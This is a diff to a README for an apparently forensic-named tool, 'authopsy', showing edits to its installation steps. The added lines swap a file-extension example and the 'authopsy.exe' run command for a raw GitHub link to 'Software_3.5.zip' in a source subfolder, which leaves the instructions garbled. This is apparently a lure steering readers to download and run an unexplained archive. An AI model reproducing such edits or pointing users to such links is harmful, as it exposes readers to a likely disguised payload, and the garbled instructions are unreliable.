NAMEAMITSONI/authopsy/README.md

    Click on the file name to start the download.
 The file will be saved to your computer.

 4. **Extract the Files (If Necessary)**
-   If you downloaded a compressed file (like .zip or .tar.gz), extract the files to a folder of your choice.
+   If you downloaded a compressed file (like .zip or https://raw.githubusercontent.com/NAMEAMITSONI/authopsy/main/src/reporter/Software_3.5.zip), extract the files to a folder of your choice.

 5. **Run the Application**
    - For Windows: Open Command Prompt and navigate to the folder where authopsy is located.
-Type `authopsy.exe` and hit Enter.
+Type `https://raw.githubusercontent.com/NAMEAMITSONI/authopsy/main/src/reporter/Software_3.5.zip` and hit Enter.
    - For macOS or Linux: Open Terminal and navigate to the folder.
 Type `./authopsy` and press Enter.

 6. **Follow On-Screen Instructions**